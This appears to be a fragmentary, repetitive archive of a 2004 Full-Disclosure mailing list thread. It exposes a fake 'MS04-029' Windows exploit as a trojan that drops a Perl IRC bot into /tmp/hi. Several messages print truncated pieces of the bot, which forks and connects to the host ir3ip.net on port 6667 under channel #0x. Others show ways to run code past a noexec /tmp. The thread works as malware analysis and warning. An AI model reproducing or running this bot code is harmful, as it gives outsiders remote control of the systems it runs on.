Anyone compiled and tested this yet ?
Cor blimey! I really hope you are joking.
Have you ever used perl before?
It's an interpreted language!
And this code looks like it connects to an IRC server (ir3ip.net), joins
a channel (#0x), then messages the user k.
Might have messed that slightly only
It was much easier to do:
$ gcc exploit.c
$ strings a.out
/lib/ld-linux.so.2
libc.so.6
memcpy
perror
chmod
fprintf
fseek
strncpy
sscanf
memset
fclose
exit
fopen
atoi
_IO_stdin_used
__libc_start_main
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
#!/usr/bin/perl
It's a simple Perl script...
and I don't think you can call it a remote exploit?
greets
Ferdinand aka. Bart
On 04.11.2004 at 11:40, DanB UK wrote:
Anyone compiled and tested this yet ?
Cor blimy! I really hope you are joking.
Have you ever used perl before?
It's an interpreted language!
And this
Yes, that's right.
On 04.11.2004 at 15:31, Vincent Archer wrote:
to
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
DanB UK wrote:
Anyone compiled and tested this yet ?
Cor blimey! I really hope you are joking.
Have you ever used perl before?
It's an interpreted language!
And this code looks like it connects to an IRC server (ir3ip.net), joins
a channel (#0x), then messages the user k.
Might have messed that
On Thu, Nov 04, 2004 at 02:32:33PM +0100, Ferdinand Klinzer wrote:
It's a simple Perl script...
and I don't think you can call it a remote exploit?
It's more subtle than you think.
The exploit is supposed to try to open a cmd tool on 31337 (eleet) on
a target Windows. It fails; the window system is secure... but meanwhile,
there's a perl IRC bot running in the background of *your* system.
From what I saw of the code yesterday a connection to the windows box
was not even
Ok so I was dumb enough to run it. Anyone else catch what commands they
run, or know of a way to track them? I really don't feel like re-compiling Gentoo.
-mike
Does anyone still have /tmp without noexec ?
/dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
On Wed, Nov 03, 2004 at 10:58:54PM -0500, Brendan Dolan-Gavitt wrote:
Here's a rather tidier version of the perl it drops in /tmp/hi,
courtesy of
It seems that it was first posted here:
http://neworder.box.sk/forum.php?did=multSecurity%20and%20Networkingthread=206439
From: raza [EMAIL PROTECTED]
To: 'Vincent Archer' [EMAIL PROTECTED], 'Ferdinand Klinzer' [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] New REmote Windows Exploit
[mailto:[EMAIL PROTECTED] On Behalf Of Vincent
Archer
Sent: 04 November 2004 14:31
To: Ferdinand Klinzer
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] New REmote Windows Exploit (MS04-029)
On Thu, Nov 04, 2004 at 02:32:33PM +0100, Ferdinand Klinzer wrote:
It's a simple Perl script
On Thu, 04 Nov 2004 11:07:47 EST, Michael Riedel said:
Ok so I was dumb enough to run it. Anyone else catch what commands they
run, or know of a way to track them? I really don't feel like re-compiling Gentoo.
Multiple people have posted what Perl code gets executed.
The problem is this:
$_ =
On Thu, 04 Nov 2004 15:33:38 -0200, Rodrigo Barbosa said:
Does anyone still have /tmp without noexec ?
/dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
1) A lot of people have a one-partition-for-everything configuration,
as that's what their distro did at the time they first installed
On Thu, Nov 04, 2004 at 02:24:53PM -0500, [EMAIL PROTECTED] wrote:
2) An amazing amount of stuff assumes that /tmp has 'exec' - at
least for a while, 'rpmbuild' of a Redhat Perl would die because it
built into a directory on /tmp, and then tried to
On Thu, Nov 04, 2004 at 03:33:38PM -0200, Rodrigo Barbosa wrote:
Does anyone still have /tmp without noexec ?
/dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
$ /lib/ld-linux.so.2 /tmp/anexe
(or in this case)
$ perl /tmp/hi
Those are just two off the top of my head; I've read of enough
On Thu, 04 Nov 2004 18:09:48 -0200, Rodrigo Barbosa said:
I'm not sure which standard (FHS ? LSB ?), but these programs should
honor the TMPDIR environment. And yes, /tmp is the fallback, in case
$TMPDIR is not set.
OpenOffice apparently does now, after I filed a bug about it. I've not
On Thu, 04 Nov 2004 14:27:30 CST, Brent J. Nordquist said:
$ /lib/ld-linux.so.2 /tmp/anexe
This one is actually nailed down in the Linux 2.6 kernel.
The moderator/admin messed things up - I did not send this!
Heikki Toivonen wrote:
/*
* Date: 2004/10/30
* Maxload [EMAIL PROTECTED]
*
* Exploit for "Vulnerability in RPC Runtime Library"
* http://www.microsoft.com/technet/security/bulletin/MS04-029.mspx
*
* Tested Against:
* Windows
python /tmp/p.py
Cute.
#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit if fork;use
IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print
$sock "USER k +i k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
Something/somebody is messing things up - I did not send this!
/*
* Date: 2004/10/30
* Maxload [EMAIL PROTECTED]
*
* Exploit for "Vulnerability in RPC Runtime Library"
* http://www.microsoft.com/technet/security/bulletin/MS04-029.mspx
*
* Tested Against:
* Windows 2000 (SP3 SP4)
*
Ahem, nice try.
http://neworder.box.sk/forum.php?did=multSecurity%20and%20Networkingthread=206439
On Wednesday 03 November 2004 02:14 pm, Heikki Toivonen wrote:
/*
* Date: 2004/10/30
* Maxload [EMAIL PROTECTED]
*
* Exploit for "Vulnerability in RPC Runtime Library"
*
It's a trojan...
[EMAIL PROTECTED]:~ strings /tmp/hi
#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit if fork;use
IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print
$sock "USER k +i k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
Excellent exploit, I'm sure no one will spot that perl IRC bot in there,
nope no one will see that...
(hint for the readers: try looking at the ASCII output of the char
*shellcode_payload= data, it looks a little like the following)
[code]
#!/usr/bin/perl
$c
han=#0x;$nick=k
;$server=ir3ip.n
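The hint above (read the ASCII of the `char *shellcode_payload` array before compiling anything) can be done mechanically: decode the C string-literal escapes to raw bytes and pull out the printable runs the way `strings` would. This is an added example, not code from the thread; `SAMPLE_C` is a constructed stand-in with a harmless script in place of the bot, and the variable name `shellcode_payload` is taken from the post above.

```python
import re

# Constructed sample, not the thread's file: a C definition in the style the
# posters describe, with a harmless embedded script in place of the IRC bot.
SAMPLE_C = r'''
char *shellcode_payload =
    "\x90\x90\x90\x90"
    "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
    "print \"constructed sample\\n\";\n"
    "\x00\xff\xfe";
'''

# Single-character C escapes; \x and octal escapes are handled by the tokenizer.
_ESC = {'n': 10, 't': 9, 'r': 13, 'a': 7, 'b': 8, 'f': 12, 'v': 11,
        '\\': 92, '"': 34, "'": 39, '?': 63}
_TOKEN = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)|(.)', re.S)
_LITERAL = r'"(?:[^"\\]|\\.)*"'          # one C string literal, quotes included
_LITERAL_BODY = r'"((?:[^"\\]|\\.)*)"'   # same, capturing only the inside


def decode_c_literal(body):
    """Decode the inside of one C string literal (quotes removed) to bytes."""
    out = bytearray()
    for hx, octal, esc, ch in _TOKEN.findall(body):
        if hx:
            out.append(int(hx, 16))
        elif octal:
            out.append(int(octal, 8) & 0xff)
        elif esc:
            out.append(_ESC.get(esc, ord(esc)))
        else:
            out += ch.encode('latin-1')
    return bytes(out)


def payload_bytes(source, name='shellcode_payload'):
    """Find `char *NAME = "..." "...";` (or char NAME[] = ...) and return its raw bytes."""
    pattern = (r'\bchar\s*\*?\s*' + re.escape(name) +
               r'\s*(?:\[[^\]]*\])?\s*=\s*((?:' + _LITERAL + r'\s*)+);')
    m = re.search(pattern, source, re.S)
    if not m:
        raise ValueError('no definition of %s found' % name)
    literals = re.findall(_LITERAL_BODY, m.group(1), re.S)
    return b''.join(decode_c_literal(lit) for lit in literals)


def printable_runs(data, min_len=4):
    """Like `strings`: return runs of printable ASCII at least min_len long."""
    pat = rb'[\x20-\x7e]{%d,}' % min_len
    return [run.decode('ascii') for run in re.findall(pat, data)]


if __name__ == '__main__':
    print('\n'.join(printable_runs(payload_bytes(SAMPLE_C))))
```

Point it at a real PoC source and a script header such as `#!/usr/bin/perl` showing up inside a "shellcode" array is the tell the posters describe.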
Interesting /tmp/hi file.
#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET->new($server.":6667")||exit;print
$sock "USER k +i k :kv1\nNICK
k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
Do I need to say more :D
You sure do, like for example, explain the following in your code and
why it makes /tmp/hi (/var/tmp/hi) and then executes it and it contains
this code
#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit if fork;use
IO::Socket;$sock =
Anyone compiled and tested this yet ?
Thanks
Raz
Yep, Dave pointed that out really fast...
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
Barrie Dempster
Sent: Wednesday, November 03, 2004 3:19 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029
Here's a rather tidier version of the perl it drops in /tmp/hi,
courtesy of PerlTidy.
#!/usr/bin/perl
$chan = "#0x";
$nick = "k";
$server = "ir3ip.net";
$SIG{TERM} = {};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET->new( $server . ":6667" ) || exit;
print $sock USER k +i k :kv1\nNICK